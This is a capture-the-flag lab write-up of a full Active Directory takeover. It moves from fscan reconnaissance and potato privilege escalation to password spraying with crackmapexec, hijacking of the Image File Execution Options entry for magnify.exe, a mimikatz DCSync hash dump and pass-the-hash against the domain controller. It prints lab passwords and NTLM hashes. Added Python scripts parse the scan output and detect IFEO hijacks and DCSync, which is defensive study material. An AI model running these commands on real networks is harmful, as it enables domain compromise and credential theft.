External foothold: run a quick vulnerability scan with fscan.
Connect to the database with the MDUT database connection tool; the account has no privileges, so upload SweetPotato (甜土豆) to escalate.
Internal foothold: the lab hint mentions user sessions, so first bring the host online in Cobalt Strike (CS).
```cmd
shell query user || qwinsta
```
View the users currently logged on.
Try process injection; it succeeds. Use net use to list the mapped shares.
There is a credential stored there.
Start collecting internal network information: upload fscan.
```text
start infoscan
(icmp) Target 172.22.8.18 is alive
(icmp) Target 172.22.8.15 is alive
(icmp) Target 172.22.8.31 is alive
(icmp) Target 172.22.8.46 is alive
[*] Icmp alive hosts len is: 4
172.22.8.15:88 open
172.22.8.18:1433 open
172.22.8.46:445 open
172.22.8.31:445 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.46:139 open
172.22.8.31:139 open
172.22.8.15:139 open
172.22.8.18:139 open
172.22.8.46:135 open
172.22.8.31:135 open
172.22.8.15:135 open
172.22.8.18:135 open
172.22.8.46:80 open
172.22.8.18:80 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:83f:175d:d89d:9280
[*] NetInfo
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[*] NetInfo
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] NetInfo
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
[*] NetBios 172.22.8.31  XIAORANG\WIN19-CLIENT
[*] NetBios 172.22.8.15  [+] DC:XIAORANG\DC01
[*] WebTitle http://172.22.8.46   code:200 len:703  title:IIS Windows Server
[*] NetBios 172.22.8.46  WIN2016.xiaorang.lab  Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.8.18   code:200 len:703  title:IIS Windows Server
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
```
1. 172.22.8.15  domain controller
2. 172.22.8.31  domain member
3. 172.22.8.18  already compromised
4. 172.22.8.46  domain member
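The host list above is what a reader has to assemble by hand from the fscan output. The following Python script is an added example (not part of the original write-up and not fscan's own code) that parses fscan's infoscan/vulscan text into a per-host inventory and turns it into the kind of findings a defender would want: hosts identified as domain controllers, exposed management or database ports, and any service that accepted credentials. The sample output embedded in it is constructed from the scan shown above with the MSSQL password replaced by a placeholder.

```python
import re
from collections import defaultdict

# Constructed sample: a trimmed copy of the fscan output shown above
# (the sa password is replaced by a placeholder).
SAMPLE_FSCAN_OUTPUT = """\
start infoscan
(icmp) Target 172.22.8.18 is alive
(icmp) Target 172.22.8.15 is alive
[*] Icmp alive hosts len is: 2
172.22.8.15:88 open
172.22.8.18:1433 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.18:80 open
[*] alive ports len is: 5
start vulscan
[*] NetInfo
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
[*] NetInfo
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[*] NetBios 172.22.8.15  [+] DC:XIAORANG\\DC01
[*] WebTitle http://172.22.8.18   code:200 len:703  title:IIS Windows Server
[+] mssql 172.22.8.18:1433:sa <redacted-placeholder>
"""

ALIVE_RE = re.compile(r"^\(icmp\) Target (\S+) is alive$")
PORT_RE = re.compile(r"^(\d+\.\d+\.\d+\.\d+):(\d+) open$")
NETINFO_HOST_RE = re.compile(r"^\[\*\](\d+\.\d+\.\d+\.\d+)$")
NETINFO_ARROW_RE = re.compile(r"^\s*\[->\](.+)$")
NETBIOS_RE = re.compile(r"^\[\*\] NetBios (\S+)\s+(.*)$")
WEBTITLE_RE = re.compile(r"^\[\*\] WebTitle (\S+)\s+code:(\d+)\s+len:(\d+)\s+title:(.*)$")
CRED_RE = re.compile(r"^\[\+\] (\w+) (\d+\.\d+\.\d+\.\d+):(\d+):(\S+) (.*)$")

# Ports whose exposure inside a network segment deserves review (assumed list, not fscan's).
REVIEW_PORTS = {135: "RPC", 139: "NetBIOS", 445: "SMB", 1433: "MSSQL", 3389: "RDP", 5985: "WinRM"}


def _new_host():
    return {"alive": False, "ports": [], "names": [], "netbios": None,
            "is_dc": False, "web": [], "creds": []}


def parse_fscan(text):
    """Turn fscan text output into {ip: host-record}."""
    hosts = defaultdict(_new_host)
    current = None  # IP of the NetInfo block being read
    for raw in text.splitlines():
        line = raw.rstrip()
        if (m := ALIVE_RE.match(line)):
            hosts[m.group(1)]["alive"] = True
        elif (m := PORT_RE.match(line)):
            hosts[m.group(1)]["ports"].append(int(m.group(2)))
        elif (m := NETINFO_HOST_RE.match(line)):
            current = m.group(1)
        elif (m := NETINFO_ARROW_RE.match(line)) and current:
            name = m.group(1).strip()
            if name != current:          # skip the line that repeats the IP itself
                hosts[current]["names"].append(name)
        elif (m := NETBIOS_RE.match(line)):
            info = m.group(2).strip().removeprefix("[+] ")
            hosts[m.group(1)]["netbios"] = info
            hosts[m.group(1)]["is_dc"] = info.startswith("DC:")
        elif (m := WEBTITLE_RE.match(line)):
            ip = m.group(1).split("//", 1)[1].split("/")[0].split(":")[0]
            hosts[ip]["web"].append({"url": m.group(1), "code": int(m.group(2)),
                                     "title": m.group(4).strip()})
        elif (m := CRED_RE.match(line)):
            # fscan prints the password after the user; it is deliberately not stored here.
            hosts[m.group(2)]["creds"].append({"service": m.group(1),
                                               "port": int(m.group(3)), "user": m.group(4)})
        else:
            current = None               # any other line ends a NetInfo block
    return dict(hosts)


def findings(hosts):
    """Defender-oriented summary: (ip, severity, message) tuples, sorted by IP."""
    out = []
    for ip, h in sorted(hosts.items()):
        for c in h["creds"]:
            out.append((ip, "CRITICAL",
                        f"{c['service']} on {c['port']} accepted credentials for '{c['user']}'"))
        if h["is_dc"]:
            out.append((ip, "INFO", f"domain controller ({h['netbios']})"))
        exposed = sorted(p for p in h["ports"] if p in REVIEW_PORTS)
        if exposed:
            out.append((ip, "REVIEW", "reachable services: " +
                        ", ".join(f"{REVIEW_PORTS[p]}/{p}" for p in exposed)))
    return out


if __name__ == "__main__":
    for ip, sev, msg in findings(parse_fscan(SAMPLE_FSCAN_OUTPUT)):
        print(f"{ip:<15} {sev:<9} {msg}")
```

Feeding the real scan output in through stdin instead of the embedded sample gives the same table for all four hosts; the credential line is recorded by service and user only, so the report can be shared without leaking the password fscan printed.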
At the same time, set up the tunnel and start working the internal network: take the account and password just obtained and try it against each host with the tools on kali.
```text
┌──(root㉿kali)-[/home/kali]
└─# proxychains4 -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!# '
SMB   172.22.8.18   445   WIN-WEB        [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-WEB) (domain:WIN-WEB) (signing:False) (SMBv1:True)
SMB   172.22.8.15   445   DC01           [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:False)
SMB   172.22.8.18   445   WIN-WEB        [-] WIN-WEB\Aldrich:Ald@rLMWuy7Z!# STATUS_LOGON_FAILURE
SMB   172.22.8.46   445   WIN2016        [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN2016) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB   172.22.8.31   445   WIN19-CLIENT   [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN19-CLIENT) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB   172.22.8.15   445   DC01           [-] xiaorang.lab\Aldrich:Ald@rLMWuy7Z!# STATUS_PASSWORD_EXPIRED
SMB   172.22.8.46   445   WIN2016        [-] xiaorang.lab\Aldrich:Ald@rLMWuy7Z!# STATUS_PASSWORD_EXPIRED
SMB   172.22.8.31   445   WIN19-CLIENT   [-] xiaorang.lab\Aldrich:Ald@rLMWuy7Z!# STATUS_PASSWORD_EXPIRED
```
Some passwords have expired; that is no problem, just change the password directly.
```bash
proxychains4 impacket-changepasswd xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!# '@172.22.8.15 -newpass 'Admin@666'
```
But only 172.22.8.46 allows a logon.
The earlier hint mentioned image hijacking (Image File Execution Options), so check the registry permissions.
```powershell
Get-Acl -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *
```
Any logged-on user can modify it, so we use the Magnifier (magnify.exe) trick for privilege escalation.
```cmd
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
```
`type "C:\Users\Administrator\flag\flag02.txt"` gives the second flag.
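The weakness exploited in this step is a writable Image File Execution Options key combined with a Debugger value on an accessibility binary, which Windows then launches as SYSTEM from the logon screen. The script below is an added example written for this write-up (it is not the author's code and not a Microsoft tool) that audits IFEO entries the way a defender would: it parses the text that `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s` prints, and flags any Debugger value, rating entries on accessibility binaries such as magnify.exe as high severity. The sample registry dump and the list of accessibility binaries are assumptions built for the example.

```python
import re

# Constructed sample of `reg query ... /s` output: the hijacked magnify.exe entry from the page,
# one unrelated IFEO subkey, and one non-accessibility program with a Debugger value.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions
    mscorsvw.exe    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe
    Debugger    REG_SZ    C:\windows\system32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\legacyapp.exe
    Debugger    REG_SZ    C:\Tools\LegacyDebugger\dbg.exe -attach
    UseFilter    REG_DWORD    0x0
"""

KEY_RE = re.compile(r"^HKEY_[A-Z_]+\\(.+)$")
# reg query prints "    <name>    <REG_TYPE>    <data>" with runs of spaces between the fields.
VALUE_RE = re.compile(r"^\s+(\S+)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$")

# Binaries that winlogon can launch as SYSTEM before anyone logs on (assumed list).
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
    "narrator.exe", "displayswitch.exe", "atbroker.exe",
}


def parse_reg_query(text):
    """Return {subkey-name-lowercase: {value-name: (type, data)}} from reg query text."""
    entries = {}
    current = None
    for line in text.splitlines():
        if (m := KEY_RE.match(line)):
            current = m.group(1).split("\\")[-1].lower()
            entries.setdefault(current, {})
        elif (m := VALUE_RE.match(line)) and current is not None:
            entries[current][m.group(1)] = (m.group(2), m.group(3).strip())
    return entries


def audit_ifeo(entries):
    """List (image, severity, detail) for every IFEO subkey that redirects execution."""
    results = []
    for image, values in entries.items():
        dbg = values.get("Debugger")
        if dbg is None:
            continue
        _, data = dbg
        if image in ACCESSIBILITY_BINARIES:
            # A debugger on an accessibility binary is the classic logon-screen SYSTEM shell.
            results.append((image, "HIGH", f"accessibility binary redirected to: {data}"))
        else:
            # Other Debugger values are occasionally legitimate (developer tooling) but must be reviewed.
            results.append((image, "REVIEW", f"execution redirected to: {data}"))
    return results


if __name__ == "__main__":
    for image, sev, detail in audit_ifeo(parse_reg_query(SAMPLE_REG_QUERY)):
        print(f"{sev:<7} {image:<18} {detail}")
```

On a live host, pipe the real `reg query ... /s` output into `parse_reg_query` and pair the result with the `Get-Acl` check from the page: the key should only be writable by SYSTEM, Administrators and TrustedInstaller, and a Debugger value on any accessibility binary should never exist outside a deliberate, documented configuration.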
Next comes lateral movement: first collect this machine's relationships within the domain using BloodHound.
We can see that this machine is also a domain controller, so we upload mimikatz (猕猴桃) and dump the hashes directly.
```cmd
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
```
```text
mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
502	krbtgt	3ffd5b58b4a6328659a606c3ea6f9b63	514
1000	DC01$	ca4725b5186b3a6699d56662b7a9b7c2	532480
500	Administrator	2c9d81bdcf3ec8b1def10328a7cc2f08	512
1103	WIN2016$	a1fbbb8b692fc8bc39c97e6eee719a23	16781312
1104	WIN19-CLIENT$	c043da1da4cd586619bc02ff8940d654	16781312
1105	Aldrich	c7c654da31ce51cbeecfef99e637be15	512
```
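A DCSync request like the one above asks the domain controller to replicate account secrets, which the DC records as a Security event 4662 whose Properties list the directory replication control-access rights. The script below is an added example (not from the write-up, not mimikatz or Microsoft code) that applies the standard defender logic: flag 4662 events that request DS-Replication-Get-Changes/-Get-Changes-All from any account that is not a known domain controller or an allowlisted replication service account. The event records are constructed to mirror the field names of a 4662 entry exported as JSON; the replication GUIDs are the well-known control-access-right GUIDs from the AD schema.

```python
# Well-known control-access-right GUIDs that appear in 4662 Properties for replication requests.
REPLICATION_RIGHTS = {
    "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes",
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes-All",
    "{89e95b76-444d-4c62-991a-0facbeda640c}": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample events, modelled on Security log 4662/4624 fields as exported by
# wevtutil or a SIEM. Event 2 reflects the DCSync on the page: mimikatz ran as SYSTEM on
# WIN2016, so the DC saw the request authenticated as the WIN2016$ machine account.
SAMPLE_EVENTS = [
    {"EventID": 4662, "TimeCreated": "2024-01-01T10:00:00Z", "Computer": "DC01.xiaorang.lab",
     "SubjectUserName": "DC01$", "SubjectDomainName": "XIAORANG",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "ObjectName": "DC=xiaorang,DC=lab",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "TimeCreated": "2024-01-01T10:05:12Z", "Computer": "DC01.xiaorang.lab",
     "SubjectUserName": "WIN2016$", "SubjectDomainName": "XIAORANG",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "ObjectName": "DC=xiaorang,DC=lab",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "TimeCreated": "2024-01-01T10:06:00Z", "Computer": "DC01.xiaorang.lab",
     "SubjectUserName": "Aldrich", "SubjectDomainName": "XIAORANG",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "ObjectName": "CN=Aldrich,CN=Users,DC=xiaorang,DC=lab",
     "Properties": "%%7688\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "TimeCreated": "2024-01-01T10:07:00Z", "Computer": "DC01.xiaorang.lab",
     "SubjectUserName": "-", "TargetUserName": "Aldrich", "LogonType": 3},
]


def replication_rights_in(event):
    """Names of the replication rights referenced by a 4662 event's Properties field."""
    props = (event.get("Properties") or "").lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def detect_dcsync(events, domain_controllers, allowed_accounts=()):
    """Return one alert per 4662 replication request from a non-DC, non-allowlisted account."""
    expected = {a.upper() for a in domain_controllers} | {a.upper() for a in allowed_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_in(ev)
        if not rights:
            continue  # 4662 on some other attribute or right; not replication
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in expected:
            continue  # DC-to-DC replication or a documented sync account
        alerts.append({
            "time": ev.get("TimeCreated"),
            "dc": ev.get("Computer"),
            "account": f"{ev.get('SubjectDomainName', '')}\\{subject}",
            "rights": rights,
            "object": ev.get("ObjectName"),
            # Get-Changes-All is what returns password hashes; its presence raises severity.
            "severity": "HIGH" if "DS-Replication-Get-Changes-All" in rights else "MEDIUM",
        })
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS, domain_controllers=["DC01$"]):
        print(f"{a['severity']} {a['time']} {a['account']} requested {', '.join(a['rights'])} on {a['object']}")
```

Auditing of 4662 must be enabled on the DCs (the Directory Service Access subcategory) for these events to exist at all, and the allowlist should contain only accounts that are documented to replicate, such as a directory synchronisation service account; a machine account of an ordinary member server, as in the sample, should never appear there.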
Then I do pass-the-hash with crackmapexec from my kali.
```bash
proxychains4 crackmapexec smb 172.22.8.15 -u administrator -H 2c9d81bdcf3ec8b1def10328a7cc2f08 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
```
Domain controller reached; third flag obtained.